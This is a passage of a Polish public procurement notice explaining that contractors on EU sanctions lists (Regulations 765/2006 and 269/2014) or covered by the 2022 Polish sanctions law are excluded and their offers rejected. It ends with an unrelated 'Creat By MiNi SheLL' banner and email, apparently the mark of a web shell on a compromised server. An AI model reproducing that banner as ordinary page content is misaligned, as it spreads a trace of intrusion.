jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3.<br/>- w kontekście powyższego Zamawiający informuje, iż z racji bezwzględnego obowiązywania i bezpośredniego stosowania przedmiotowej regulacji prawnej (obok ustawy Pzp i niezależnie od samych zapisów SWZ – przywołujących podstawy wykluczenia określone w art. 108 ustawy Pzp) wykonawcy, wobec których istnieją okoliczności, o których mowa w art. 7 ust. 1 ustawy, podlegać będą wykluczeniu z udziału w niniejszym postępowaniu wprost na podstawie przedmiotowej szczególnej regulacji prawnej – niezależnie i obok podstaw wykluczenia statuowanych w art. 108 ustawy Pzp, w związku z czym złożone przez nich oferty będą odrzucane jako oferty złożone przez wykonawców podlegających wykluczeniu z udziału w postępowaniu i oferty nieważne na podstawie odrębnych przepisów.

Creat By MiNi SheLL
Email: jattceo@gmail.com